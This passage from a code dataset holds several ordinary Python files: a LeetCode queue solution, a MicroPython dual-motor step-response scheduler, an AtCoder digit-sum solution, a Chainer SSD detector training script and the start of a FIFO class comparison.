get_segment_stats_table\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"crypto/test_utils/user_data_fixture.py","file_name":"user_data_fixture.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2242921131","text":"class Solution:\n def reconstructQueue(self, people):\n \"\"\"\n :type people: List[List[int]]\n :rtype: List[List[int]]\n \"\"\"\n reconstructedQueue = []\n \n # key: h, value = [h,k]\n sorted_map = {}\n \n # Create a map for people that have the same h\n for person in people:\n \n if person[0] in sorted_map:\n sorted_map[person[0]].append(person)\n else:\n sorted_map[person[0]] = [person]\n \n for key in sorted_map:\n sorted_map[key] = sorted(sorted_map[key])\n \n for key in sorted(sorted_map,reverse = True):\n \n for person in sorted_map[key]:\n reconstructedQueue.insert(person[1],person[:])\n \n return reconstructedQueue","repo_name":"chungyang/LeetCode","sub_path":"src/reconstructQueue.py","file_name":"reconstructQueue.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7398394895","text":"\"\"\"!\n@file main.py\n This file contains a task scheduling program that performs two step response tests on two different motors simultaneously.\n\n@author Richard Kwan, Chayton Ritter, Jackie Chen, JR Ridgely\n@date 2023-Feb-7 Created by modifying existing task sharing example by JR Ridgely\n\"\"\"\n\nimport gc\nimport pyb\nimport utime\nimport cotask\nimport motor_driver\nimport encoder_reader\nimport closedloopcontrol\n\ndef task_mc(motor, encoder, controller):\n '''!\n Task which proportionally controls a motor.\n @param motor A motor object\n @param encoder An encoder object\n @param controller A controller object\n '''\n # Adjust motor power\n while True:\n a = controller.run(encoder.read())\n yield\n motor.set_duty_cycle(a)\n yield\n\n\nif __name__ == \"__main__\":\n \n # Initialize UART\n u2 = pyb.UART(2, baudrate=115200)\n \n # Initialize motor/encoder/controller 1\n M1 = motor_driver.MotorDriver('A10', 'B4', 'B5', 3, 1, 2)\n E1 = encoder_reader.EncoderReader('C6', 'C7', 8, 1, 2)\n C1 = closedloopcontrol.cl_loop(0.015, 5000)\n M1.enable_motor()\n \n # Initialize motor/encoder/controller 2\n M2 = motor_driver.MotorDriver('C1', 'A0', 'A1', 5, 1, 2)\n E2 = encoder_reader.EncoderReader('B6', 'B7', 4, 1, 2)\n C2 = closedloopcontrol.cl_loop(0.015, 10000)\n M2.enable_motor()\n \n # Create tasks\n task1 = cotask.Task(task_mc, name='Motor_1', priority=1, period=10,\n profile=True, trace=False, mec=(M1, E1, C1))\n task2 = cotask.Task(task_mc, name='Motor_2', priority=2, period=10,\n profile=True, trace=False, mec=(M2, E2, C2))\n cotask.task_list.append(task1)\n cotask.task_list.append(task2)\n\n # Run the memory garbage collector to ensure memory is as defragmented as\n # possible before the real-time scheduler is started\n gc.collect()\n\n # Start timer\n start_time = utime.ticks_ms()\n\n # Run the scheduler with the chosen scheduling algorithm. Quit if ^C pressed\n while True:\n try:\n cotask.task_list.pri_sched()\n \n time_diff = utime.ticks_diff(utime.ticks_ms(), start_time)\n if time_diff > 3000:\n break\n except KeyboardInterrupt:\n break\n\n # Turn off motors\n M1.set_duty_cycle(0)\n M2.set_duty_cycle(0)\n M1.disable_motor()\n M2.disable_motor()\n \n # Transmit data back\n pos_1 = C1.get_pos_data()\n pos_1str = [str(i) for i in pos_1]\n pos_2 = C2.get_pos_data()\n pos_2str = [str(i) for i in pos_2]\n tx1 = ','.join(pos_1str)\n tx2 = ','.join(pos_2str)\n u2.write(tx1+'\\n')\n utime.sleep_ms(1000)\n u2.write(tx2+'\\n')\n","repo_name":"artificialsalt/405L3","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15138027929","text":"def dsum(n):\r\n ret = 0\r\n while n > 0:\r\n ret += n % 10\r\n n //= 10\r\n return ret\r\nn = int(input())\r\nans = 10**7\r\nfor i in range(1, n//2+1):\r\n ans = min(ans, dsum(i) + dsum(n-i))\r\nprint(ans)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/agc025/A/4809844.py","file_name":"4809844.py","file_ext":"py","file_size_in_byte":212,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"13096312546","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport argparse\nimport datetime\nimport json\nimport multiprocessing\nimport os\nimport random\nimport sys\nimport threading\nimport time\nimport math\n\nimport numpy as np\nimport six\nimport six.moves.cPickle as pickle\nfrom six.moves import queue\n\nimport chainer\nfrom chainer import computational_graph\nfrom chainer import cuda\nfrom chainer import optimizers\nfrom chainer import serializers\nfrom chainer import link\nimport chainer.functions as F\n\nfrom glob import glob\nfrom os import path\n\n#import cPickle\nimport _pickle as cPickle\nimport cv2 as cv\n\nimport common_params\nfrom data_augmentation import trainAugmentation\nfrom my_func import SumSquaredError\nfrom my_func import sum_squared_error\n\ncv.CV_AA = cv.LINE_AA\n\ndef copy_model(src, dst):\n assert isinstance(src, link.Chain)\n assert isinstance(dst, link.Chain)\n\n for child in src.children():\n if child.name not in dst.__dict__:\n continue\n dst_child = dst[child.name]\n if type(child) != type(dst_child):\n continue\n if isinstance(child, link.Chain):\n copy_model(child, dst_child)\n if isinstance(child, link.Link):\n match = True\n for a, b in zip(child.namedparams(), dst_child.namedparams()):\n if a[0] != b[0]:\n match = False\n break\n if a[1].data.shape != b[1].data.shape:\n match = False\n break\n if not match:\n print('Ignore %s because of parameter mismatch' % child.name)\n continue\n for a, b in zip(child.namedparams(), dst_child.namedparams()):\n b[1].data = a[1].data\n print('Copy %s' % child.name)\n\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--batchsize', '-B', type = int, default = 8, help = 'Learning minibatch size')\nparser.add_argument('--epoch', '-E', default = 80, type = int, help='Number of epochs to learn')\nparser.add_argument('--gpu', '-g', default = -1, type = int, help='GPU ID (negative value indicates CPU)')\nparser.add_argument('--loaderjob', '-j', default = 4, type=int, help='Number of parallel data loading processes')\nparser.add_argument('--suffix', '-S', default = \"\", type=str, help='Suffix of model saving directory')\nargs = parser.parse_args()\n\nif args.gpu >= 0:\n cuda.check_cuda_available()\nxp = cuda.cupy if args.gpu >= 0 else np\n\n\nprint('VGG Netの読み込み中...')\nfrom VGG_Net import VGGNet\nvgg_model = VGGNet()\nserializers.load_npz('./pretrained_model/VGGNet_for_SSD_ILSVRC.model', vgg_model)\nprint('-> 読み込み完了')\n\nfrom SSD_Net import SSDNet\nssd_model = SSDNet()\n\nif args.gpu >= 0:\n cuda.get_device(args.gpu).use()\n vgg_model.to_gpu()\n ssd_model.to_gpu()\n\ncopy_model(vgg_model, ssd_model)\n\ndel (vgg_model)\n\n# Setup optimizer\n# AdamよりMomentumSGDの方か良い?? (YOLOはMomentumSGDで実装されている)\n#optimizer = optimizers.Adam()\noptimizer = optimizers.MomentumSGD(lr = common_params.learning_rate, momentum = common_params.momentum)\n\noptimizer.setup(ssd_model)\n\noptimizer.add_hook(chainer.optimizer.WeightDecay(common_params.weight_decay))\n\n# epoch数\nn_epoch = args.epoch\n\n# バッチサイズ\nbatchsize = args.batchsize\n\nstep = int(math.floor((common_params.max_ratio - common_params.min_ratio) / (len(common_params.mbox_source_layers) - 2)))\n\nmin_sizes = []\nmax_sizes = []\n\n# Default boxの最小・最大サイズを計算\nfor ratio in range(common_params.min_ratio, common_params.max_ratio + 1, step):\n min_sizes.append(common_params.insize * ratio / 100.)\n max_sizes.append(common_params.insize * (ratio + step) / 100.)\n\nmin_sizes = [common_params.insize * 10 / 100.] + min_sizes\nmax_sizes = [common_params.insize * 20 / 100.] + max_sizes\n\n\n\n# 学習データの読み込み\ndef readTrainData(input_name, confing_image):\n\n aug_p = open(common_params.images_dir + '/train/img_aug_param/' + input_name + '.txt', 'r')\n\n in_line = aug_p.readline()\n opath = in_line.split(' \\n')\n original_img_path = str(opath[0])\n\n in_line = aug_p.readline()\n augmentation = int(in_line)\n\n in_line = aug_p.readline()\n part = in_line.split(' ')\n border_pixels = [int(part[0]), int(part[1]), int(part[2]), int(part[3])]\n\n in_line = aug_p.readline()\n part = in_line.split(' ')\n crop_param = [float(part[0]), float(part[1]), float(part[2]), float(part[3])]\n\n in_line = aug_p.readline()\n part = in_line.split(' ')\n hsv_param = [float(part[0]), float(part[1]), float(part[2])]\n\n in_line = aug_p.readline()\n flip_type = int(in_line)\n\n\n # 入力画像の読み込み\n color_img = cv.imread(common_params.images_dir + '/train/rgb/' + original_img_path + '.png', cv.IMREAD_COLOR)\n\n if color_img is None:\n print('画像が読み込めません')\n print(common_params.images_dir + '/train/rgb/' + original_img_path + '.png')\n sys.exit(1)\n\n # 画像をSSDの入力サイズにリサイズ\n input_img = cv.resize(color_img, (common_params.insize, common_params.insize), interpolation = cv.INTER_CUBIC)\n\n if augmentation == 1:\n input_img = trainAugmentation(input_img, border_pixels, crop_param, hsv_param, flip_type)\n\n if confing_image:\n conf_img = input_img.copy()\n\n # 画像データをfloatに変換\n input_img = input_img.astype(np.float32)\n\n # 画像の平均値を引く\n input_img -= np.array([103.939, 116.779, 123.68])\n\n #input_img /= 255.\n\n # 画像の次元を(高さ,幅,チャンネル数)から(チャンネル数, 高さ,幅)へ転置\n input_img = input_img.transpose(2, 0, 1)\n\n gt_boxes = []\n df_boxes = []\n indices = []\n classes = []\n\n idx_tmp = []\n\n # positiveサンプルの読み込み\n pos_num = 0\n f = open(common_params.images_dir + '/train/positives/' + input_name + '.txt', 'r')\n for rw in f:\n ln = rw.split(' ')\n classes.append(int(ln[1]))\n gt_boxes.append([float(ln[2]), float(ln[3]), float(ln[4]), float(ln[5])])\n df_boxes.append([float(ln[6]), float(ln[7]), float(ln[8]), float(ln[9])])\n indices.append([int(ln[10]), int(ln[11]), int(ln[12]), int(ln[13])])\n pos_num += 1\n f.close()\n\n # hard negativeサンプルの読み込み (最大でpositiveサンプル数の3倍)\n neg_num = 0\n f = open(common_params.images_dir + '/train/negatives/' + input_name + '.txt', 'r')\n for rw in f:\n ln = rw.split(' ')\n classes.append(int(ln[1]))\n gt_boxes.append([float(ln[2]), float(ln[3]), float(ln[4]), float(ln[5])])\n df_boxes.append([float(ln[2]), float(ln[3]), float(ln[4]), float(ln[5])])\n idx_tmp.append([int(ln[10]), int(ln[11]), int(ln[12]), int(ln[13])])\n neg_num += 1\n f.close()\n\n hardneg_size = pos_num * 3 if neg_num > (pos_num * 3) else neg_num\n\n perm = np.random.permutation(len(idx_tmp))\n\n for hn in range(0, hardneg_size):\n indices.append(idx_tmp[perm[hn]])\n\n\n return (input_img, gt_boxes, df_boxes, indices, classes, conf_img)\n\n\n\n# 誤差関数\ndef lossFunction(Loc, Cls, gt_box_batch, df_box_batch, idx_batch, cls_batch, bat_s, mining):\n\n if mining:\n # hard negative mining有効時のクラスラベル\n cls_t1 = np.ones((bat_s, common_params.num_boxes[0], common_params.map_sizes[0], common_params.map_sizes[0]), np.int32) * -1\n cls_t2 = np.ones((bat_s, common_params.num_boxes[1], common_params.map_sizes[1], common_params.map_sizes[1]), np.int32) * -1\n cls_t3 = np.ones((bat_s, common_params.num_boxes[2], common_params.map_sizes[2], common_params.map_sizes[2]), np.int32) * -1\n cls_t4 = np.ones((bat_s, common_params.num_boxes[3], common_params.map_sizes[3], common_params.map_sizes[3]), np.int32) * -1\n cls_t5 = np.ones((bat_s, common_params.num_boxes[4], common_params.map_sizes[4], common_params.map_sizes[4]), np.int32) * -1\n cls_t6 = np.ones((bat_s, common_params.num_boxes[5], common_params.map_sizes[5], common_params.map_sizes[5]), np.int32) * -1\n else:\n # hard negative mining無効時のクラスラベル\n cls_t1 = np.zeros((bat_s, common_params.num_boxes[0], common_params.map_sizes[0], common_params.map_sizes[0]), np.int32)\n cls_t2 = np.zeros((bat_s, common_params.num_boxes[1], common_params.map_sizes[1], common_params.map_sizes[1]), np.int32)\n cls_t3 = np.zeros((bat_s, common_params.num_boxes[2], common_params.map_sizes[2], common_params.map_sizes[2]), np.int32)\n cls_t4 = np.zeros((bat_s, common_params.num_boxes[3], common_params.map_sizes[3], common_params.map_sizes[3]), np.int32)\n cls_t5 = np.zeros((bat_s, common_params.num_boxes[4], common_params.map_sizes[4], common_params.map_sizes[4]), np.int32)\n cls_t6 = np.zeros((bat_s, common_params.num_boxes[5], common_params.map_sizes[5], common_params.map_sizes[5]), np.int32)\n\n # bounding boxのオフセットベクトルの教示データ\n loc_t1 = np.zeros((bat_s, common_params.num_boxes[0] * common_params.num_of_offset_dims, common_params.map_sizes[0], common_params.map_sizes[0]), np.float32)\n loc_t2 = np.zeros((bat_s, common_params.num_boxes[1] * common_params.num_of_offset_dims, common_params.map_sizes[1], common_params.map_sizes[1]), np.float32)\n loc_t3 = np.zeros((bat_s, common_params.num_boxes[2] * common_params.num_of_offset_dims, common_params.map_sizes[2], common_params.map_sizes[2]), np.float32)\n loc_t4 = np.zeros((bat_s, common_params.num_boxes[3] * common_params.num_of_offset_dims, common_params.map_sizes[3], common_params.map_sizes[3]), np.float32)\n loc_t5 = np.zeros((bat_s, common_params.num_boxes[4] * common_params.num_of_offset_dims, common_params.map_sizes[4], common_params.map_sizes[4]), np.float32)\n loc_t6 = np.zeros((bat_s, common_params.num_boxes[5] * common_params.num_of_offset_dims, common_params.map_sizes[5], common_params.map_sizes[5]), np.float32)\n\n for b in range(0, len(idx_batch)):\n for i in range(0, len(idx_batch[b])):\n\n fmap_layer = idx_batch[b][i][1]\n fmap_position = idx_batch[b][i][2]\n df_box_num = idx_batch[b][i][3]\n st_box_idx = df_box_num * common_params.num_of_offset_dims\n ed_box_idx = st_box_idx + common_params.num_of_offset_dims\n\n c = int(fmap_position % common_params.map_sizes[fmap_layer])\n r = int(fmap_position / common_params.map_sizes[fmap_layer])\n\n item_class_id = cls_batch[b][i]\n\n # 1〜6番目のdefault boxのクラスとオフセットの教示データを格納\n if fmap_layer == 0:\n cls_t1[b, df_box_num, r, c] = item_class_id\n loc_t1[b, st_box_idx : ed_box_idx, r, c] = (np.array(gt_box_batch[b][i], np.float32) - np.array(df_box_batch[b][i], np.float32)) / common_params.loc_var\n elif fmap_layer == 1:\n cls_t2[b, df_box_num, r, c] = item_class_id\n loc_t2[b, st_box_idx : ed_box_idx, r, c] = (np.array(gt_box_batch[b][i], np.float32) - np.array(df_box_batch[b][i], np.float32)) / common_params.loc_var\n elif fmap_layer == 2:\n cls_t3[b, df_box_num, r, c] = item_class_id\n loc_t3[b, st_box_idx : ed_box_idx, r, c] = (np.array(gt_box_batch[b][i], np.float32) - np.array(df_box_batch[b][i], np.float32)) / common_params.loc_var\n elif fmap_layer == 3:\n cls_t4[b, df_box_num, r, c] = item_class_id\n loc_t4[b, st_box_idx : ed_box_idx, r, c] = (np.array(gt_box_batch[b][i], np.float32) - np.array(df_box_batch[b][i], np.float32)) / common_params.loc_var\n elif fmap_layer == 4:\n cls_t5[b, df_box_num, r, c] = item_class_id\n loc_t5[b, st_box_idx : ed_box_idx, r, c] = (np.array(gt_box_batch[b][i], np.float32) - np.array(df_box_batch[b][i], np.float32)) / common_params.loc_var\n elif fmap_layer == 5:\n cls_t6[b, df_box_num, r, c] = item_class_id\n loc_t6[b, st_box_idx : ed_box_idx, r, c] = (np.array(gt_box_batch[b][i], np.float32) - np.array(df_box_batch[b][i], np.float32)) / common_params.loc_var\n\n\n # 1〜6階層目の教示confidence mapをint32型のarrayにする\n cls_t1 = xp.array(cls_t1, np.int32)\n cls_t2 = xp.array(cls_t2, np.int32)\n cls_t3 = xp.array(cls_t3, np.int32)\n cls_t4 = xp.array(cls_t4, np.int32)\n cls_t5 = xp.array(cls_t5, np.int32)\n cls_t6 = xp.array(cls_t6, np.int32)\n\n # 1〜6階層目の教示confidence mapをVariableにする\n cls_t1_data = chainer.Variable(cls_t1)\n cls_t2_data = chainer.Variable(cls_t2)\n cls_t3_data = chainer.Variable(cls_t3)\n cls_t4_data = chainer.Variable(cls_t4)\n cls_t5_data = chainer.Variable(cls_t5)\n cls_t6_data = chainer.Variable(cls_t6)\n\n # 1〜6階層目の教示confidence mapの次元を(バッチ数, DF box数, 高さ, 幅)から(バッチ数, 高さ, 幅, DF box数)に転置\n cls_t1_data = F.transpose(cls_t1_data, [0, 2, 3, 1])\n cls_t2_data = F.transpose(cls_t2_data, [0, 2, 3, 1])\n cls_t3_data = F.transpose(cls_t3_data, [0, 2, 3, 1])\n cls_t4_data = F.transpose(cls_t4_data, [0, 2, 3, 1])\n cls_t5_data = F.transpose(cls_t5_data, [0, 2, 3, 1])\n cls_t6_data = F.transpose(cls_t6_data, [0, 2, 3, 1])\n\n # 1〜6階層目の教示confidence mapの各次元数を(バッチ数, 高さ, 幅, DF box数)から(バッチ数 * 高さ * 幅 * DF box数)にreshape\n cls_t1_data = F.reshape(cls_t1_data, [cls_t1_data.data.shape[0] * cls_t1_data.data.shape[1] * cls_t1_data.data.shape[2] * common_params.num_boxes[0]])\n cls_t2_data = F.reshape(cls_t2_data, [cls_t2_data.data.shape[0] * cls_t2_data.data.shape[1] * cls_t2_data.data.shape[2] * common_params.num_boxes[1]])\n cls_t3_data = F.reshape(cls_t3_data, [cls_t3_data.data.shape[0] * cls_t3_data.data.shape[1] * cls_t3_data.data.shape[2] * common_params.num_boxes[2]])\n cls_t4_data = F.reshape(cls_t4_data, [cls_t4_data.data.shape[0] * cls_t4_data.data.shape[1] * cls_t4_data.data.shape[2] * common_params.num_boxes[3]])\n cls_t5_data = F.reshape(cls_t5_data, [cls_t5_data.data.shape[0] * cls_t5_data.data.shape[1] * cls_t5_data.data.shape[2] * common_params.num_boxes[4]])\n cls_t6_data = F.reshape(cls_t6_data, [cls_t6_data.data.shape[0] * cls_t6_data.data.shape[1] * cls_t6_data.data.shape[2] * common_params.num_boxes[5]])\n\n # 1〜6階層目の教示localization mapをfloat32型のarrayにする\n loc_t1 = xp.array(loc_t1, np.float32)\n loc_t2 = xp.array(loc_t2, np.float32)\n loc_t3 = xp.array(loc_t3, np.float32)\n loc_t4 = xp.array(loc_t4, np.float32)\n loc_t5 = xp.array(loc_t5, np.float32)\n loc_t6 = xp.array(loc_t6, np.float32)\n\n # 1〜6階層目の教示localization mapをVariableにする\n loc_t1_data = chainer.Variable(loc_t1)\n loc_t2_data = chainer.Variable(loc_t2)\n loc_t3_data = chainer.Variable(loc_t3)\n loc_t4_data = chainer.Variable(loc_t4)\n loc_t5_data = chainer.Variable(loc_t5)\n loc_t6_data = chainer.Variable(loc_t6)\n\n # 1〜6階層目の教示localization mapの次元を(バッチ数, オフセット次元数 * DF box数, 高さ, 幅)から(バッチ数, 高さ, 幅, オフセット次元数 * DF box数)に転置\n loc_t1_data = F.transpose(loc_t1_data, [0, 2, 3, 1])\n loc_t2_data = F.transpose(loc_t2_data, [0, 2, 3, 1])\n loc_t3_data = F.transpose(loc_t3_data, [0, 2, 3, 1])\n loc_t4_data = F.transpose(loc_t4_data, [0, 2, 3, 1])\n loc_t5_data = F.transpose(loc_t5_data, [0, 2, 3, 1])\n loc_t6_data = F.transpose(loc_t6_data, [0, 2, 3, 1])\n\n # 1〜6階層目の教示localization mapの各次元数を(バッチ数, 高さ, 幅, オフセット次元数 * DF box数)から(バッチ数 * 高さ * 幅 * DF box数, オフセット次元数)にreshape\n loc_t1_data = F.reshape(loc_t1_data, [loc_t1_data.data.shape[0] * loc_t1_data.data.shape[1] * loc_t1_data.data.shape[2] * common_params.num_boxes[0], int(loc_t1_data.data.shape[3] / common_params.num_boxes[0])])\n loc_t2_data = F.reshape(loc_t2_data, [loc_t2_data.data.shape[0] * loc_t2_data.data.shape[1] * loc_t2_data.data.shape[2] * common_params.num_boxes[1], int(loc_t2_data.data.shape[3] / common_params.num_boxes[1])])\n loc_t3_data = F.reshape(loc_t3_data, [loc_t3_data.data.shape[0] * loc_t3_data.data.shape[1] * loc_t3_data.data.shape[2] * common_params.num_boxes[2], int(loc_t3_data.data.shape[3] / common_params.num_boxes[2])])\n loc_t4_data = F.reshape(loc_t4_data, [loc_t4_data.data.shape[0] * loc_t4_data.data.shape[1] * loc_t4_data.data.shape[2] * common_params.num_boxes[3], int(loc_t4_data.data.shape[3] / common_params.num_boxes[3])])\n loc_t5_data = F.reshape(loc_t5_data, [loc_t5_data.data.shape[0] * loc_t5_data.data.shape[1] * loc_t5_data.data.shape[2] * common_params.num_boxes[4], int(loc_t5_data.data.shape[3] / common_params.num_boxes[4])])\n loc_t6_data = F.reshape(loc_t6_data, [loc_t6_data.data.shape[0] * loc_t6_data.data.shape[1] * loc_t6_data.data.shape[2] * common_params.num_boxes[5], int(loc_t6_data.data.shape[3] / common_params.num_boxes[5])])\n\n # 1〜6階層目の教示confidence mapを結合\n Cls_T = F.concat([cls_t1_data, cls_t2_data, cls_t3_data, cls_t4_data, cls_t5_data, cls_t6_data], axis = 0)\n\n\n # 1〜6階層目の教示localization mapを結合\n Loc_T = F.concat([loc_t1_data, loc_t2_data, loc_t3_data, loc_t4_data, loc_t5_data, loc_t6_data], axis = 0)\n\n # confidence mapのloss\n loss_cls = F.softmax_cross_entropy(Cls, Cls_T)\n\n # localization mapのloss\n # オリジナル実装ではSmooth L1 Lossだが、本ソースコードではMean Squared Errorを使用\n # Smooth L1 Lossで誤差を求める場合は「F.huber_loss(x, t, delta = 1.0)」\n loss_loc = F.mean_squared_error(Loc, Loc_T)\n #loss_loc = F.mean_absolute_error(Loc, LT)\n #loss_loc = sum_squared_error(Loc, LT)\n\n del cls_t1, cls_t2, cls_t3, cls_t4, cls_t5, cls_t6\n del loc_t1, loc_t2, loc_t3, loc_t4, loc_t5, loc_t6\n del cls_t1_data, cls_t2_data, cls_t3_data, cls_t4_data, cls_t5_data, cls_t6_data\n del loc_t1_data, loc_t2_data, loc_t3_data, loc_t4_data, loc_t5_data, loc_t6_data\n\n return (0.4 * loss_loc) + (0.6 * loss_cls)\n\n\n# 学習データリストの読み込み\nf = open('./augimg_name_list.txt', 'r')\ninput_list = []\nfor line in f:\n ln = line.split('\\n')\n input_list.append(ln[0])\nf.close()\n\ninput_list = np.array(input_list)\n\n# 学習データ数\nN = len(input_list)\nprint ('Training samples : ', N)\nitr_loss_save = int((float(N) / float(batchsize)) * 0.1) * 10\nprint ('Training samples per batchsize : ', float(N) / float(batchsize))\nprint ('Iteration save : ', itr_loss_save)\n\nssd_model.train = True\n\ntoday = datetime.datetime.today()\n\ntoday_dir = str(today.year) + '-' + str('%02d' % today.month) + '-' + str('%02d' % today.day) + '@' + str('%02d' % today.hour) + '-' + str('%02d' % today.minute) + '-' + str('%02d' % today.second) + '_' + args.suffix\n\ntoday_dir_path = common_params.save_model_dir + '/' + today_dir\n\nif not path.exists(today_dir_path):\n os.mkdir(today_dir_path)\n\nfout = open(today_dir_path + '/loss.txt', 'w')\n\nsave_model_path = today_dir_path + '/model'\nsave_optimizer_path = today_dir_path + '/optimizer'\n\nif not path.exists(save_model_path):\n os.mkdir(save_model_path)\n\nif not path.exists(save_optimizer_path):\n os.mkdir(save_optimizer_path)\n\n\ndata_q = queue.Queue(maxsize=1)\nres_q = queue.Queue()\n\ndef feed_data():\n i = 0\n\n batch_pool = [None] * batchsize\n\n pool = multiprocessing.Pool(args.loaderjob)\n\n data_q.put('train')\n\n # エポックループ\n for epoch in range(0, n_epoch):\n\n # changing learning rate (common_params.learning_rate * (common_params.lr_step ** (n_epoch - common_params.lr_change_epoch)))\n if (epoch + 1) >= common_params.lr_change_epoch:\n optimizer.lr *= common_params.lr_step if optimizer.lr >= common_params.lower_lr else common_params.lower_lr\n\n\n print ('\\nEpoch: %d, Learning rate: %f (%s)' % (epoch + 1, optimizer.lr, today_dir))\n\n perm = np.random.permutation(N)\n\n # 学習サンプルのループ\n for dt in range(0, N):\n\n x_list = input_list[perm[dt]]\n\n batch_pool[i] = pool.apply_async(readTrainData, (x_list, True))\n i += 1\n\n img_batch = []\n gt_box_batch = []\n df_box_batch = []\n idx_batch = []\n cls_batch = []\n conf_img_batch = []\n\n if i == batchsize:\n for inc, x_data in enumerate(batch_pool):\n input_img, gt_boxes, df_boxes, indices, classes, conf_img = x_data.get()\n img_batch.append(input_img)\n gt_box_batch.append(gt_boxes)\n df_box_batch.append(df_boxes)\n idx_batch.append(indices)\n cls_batch.append(classes)\n conf_img_batch.append(conf_img)\n data_q.put((img_batch, gt_box_batch, df_box_batch, idx_batch, cls_batch, conf_img_batch, epoch + 1))\n i = 0\n\n del img_batch, gt_box_batch, df_box_batch, idx_batch, cls_batch, conf_img_batch\n\n # 学習したモデルとoptimizerを保存\n if epoch + 1 >= 50:\n if (epoch + 1) % 2 == 0:\n serializers.save_npz(save_model_path + \"/SSD_epoch_\" + str(epoch + 1) + \"_with_mining.model\", ssd_model)\n serializers.save_npz(save_optimizer_path + \"/SSD_epoch_\" + str(epoch + 1) + \"_with_mining.state\", optimizer)\n else:\n serializers.save_npz(save_model_path + \"/SSD_epoch_\" + str(epoch + 1) + \"_without_mining.model\", ssd_model)\n serializers.save_npz(save_optimizer_path + \"/SSD_epoch_\" + str(epoch + 1) + \"_without_mining.state\", optimizer)\n\n pool.close()\n pool.join()\n data_q.put('end')\n\ndef log_result():\n\n sum_loss = 0.\n sum_bat = 0\n itr = 0\n begin_at = time.time()\n\n while True:\n result = res_q.get()\n if result == 'end':\n break\n elif result == 'train':\n continue\n\n loss, bat = result\n\n duration = time.time() - begin_at\n\n sum_loss += loss\n sum_bat += bat\n itr += 1\n\n sys.stdout.write('\\rUpdates: {}, Time: {}, Loss: {}'.format(itr, datetime.timedelta(seconds = duration), loss))\n sys.stdout.flush()\n time.sleep(0.01)\n\n if itr % itr_loss_save == 0:\n print (\" [%d iteration loss: %f]\" % (itr, sum_loss / float(itr_loss_save)))\n out_line = '{} {} {} \\n'.format(itr, sum_loss / float(itr_loss_save), optimizer.lr)\n fout.write(out_line)\n sum_loss = 0.\n sum_bat = 0\n\n\ndef train_loop():\n\n while True:\n input_data = data_q.get()\n if input_data == 'end':\n res_q.put('end')\n break\n elif input_data == 'train':\n res_q.put('train')\n continue\n\n img_batch, gt_box_batch, df_box_batch, idx_batch, cls_batch, conf_img_batch, epoch_num = input_data\n\n # ---教師ラベル確認用(画像の確認が不要な場合は以下14行をコメントアウト)----------------------------------\n # for b in range(0, len(conf_img_batch)):\n # font = cv.FONT_HERSHEY_SIMPLEX\n # for bx in range(len(gt_box_batch[b]) - 1, 0, -1):\n # p1 = int(gt_box_batch[b][bx][0] * common_params.insize)\n # p2 = int(gt_box_batch[b][bx][1] * common_params.insize)\n # p3 = int(gt_box_batch[b][bx][2] * common_params.insize)\n # p4 = int(gt_box_batch[b][bx][3] * common_params.insize)\n # cv.rectangle(conf_img_batch[b], (p1, p2), (p3, p4), (0, 255, 0), 2)\n # q1 = p1\n # q2 = p4\n # cv.rectangle(conf_img_batch[b], (q1, q2 - 25), (q1 + 25, q2), (0, 255, 0), -1)\n # cv.putText(conf_img_batch[b], str(cls_batch[b][bx]), (q1, q2 - 8), font, 0.6, (0, 0, 0), 1, cv.CV_AA)\n # cv.imshow('Augmentation', conf_img_batch[b])\n # cv.waitKey()\n # ------------------------------------------------------------------------------------------\n\n bat_s = len(img_batch)\n\n ssd_model.cleargrads()\n\n train_img = chainer.Variable(xp.array(img_batch))\n\n # SSD net forward\n Loc1, Cls1, Loc2, Cls2, Loc3, Cls3, Loc4, Cls4, Loc5, Cls5, Loc6, Cls6 = ssd_model(train_img)\n\n # ネットワークから出力されたconfidence mapを1〜6階層目まで結合\n Loc = F.concat([Loc1, Loc2, Loc3, Loc4, Loc5, Loc6], axis = 0)\n\n # ネットワークから出力されたlocalization mapを1〜6階層目まで結合\n Cls = F.concat([Cls1, Cls2, Cls3, Cls4, Cls5, Cls6], axis = 0)\n\n # epochが2回に1回の割合でhard negative mining有効\n if epoch_num % 2 == 0:\n mining = True\n else:\n mining = False\n\n # lossを計算\n loss = lossFunction(Loc, Cls, gt_box_batch, df_box_batch, idx_batch, cls_batch, bat_s, mining)\n loss.backward()\n\n optimizer.update()\n\n res_q.put((float(loss.data), float(bat_s)))\n\n del img_batch, gt_box_batch, df_box_batch, idx_batch, cls_batch, conf_img_batch\n\n del train_img\n del Loc1, Loc2, Loc3, Loc4, Loc5, Loc6\n del Cls1, Cls2, Cls3, Cls4, Cls5, Cls6\n del Loc, Cls\n\n\n\nfeeder = threading.Thread(target = feed_data)\nfeeder.daemon = True\nfeeder.start()\nlogger = threading.Thread(target = log_result)\nlogger.daemon = True\nlogger.start()\n\ntrain_loop()\nfeeder.join()\nlogger.join()\n\nfout.close()\nprint(\"\\nExit Training\\n\")\n","repo_name":"machine-perception-robotics-group/MT-DSSD","sub_path":"Train_SSD.py","file_name":"Train_SSD.py","file_ext":"py","file_size_in_byte":25698,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"15298720456","text":"from collections import deque\nfrom timeit import default_timer as timer\n\"\"\"Первый класс, реализуемый с помощью модуля deque\"\"\"\nclass Fifo():\n fifo_list = deque(maxlen=10)\n\n def inserts(self, item):\n self.fifo_list.append(item)\n\n def past(self):\n return print(self.fifo_list.popleft())\n\nstart_time = timer()\nr = Fifo()\nr.inserts(4)\nr.inserts('123')\nr.inserts(111)\nend_time = timer()\nprint(end_time - start_time)\nprint(r.fifo_list)\nr.past()\nprint(r.fifo_list)\nprint()\n\n\"\"\"Второй и третий класс, реализуемый с помощью методо�� списка(скорость их обработки меньше, при большом колличестве елементов списка)\"\"\"\nclass SimplePop:\n fifo_list = []\n def inserts(self, item):\n 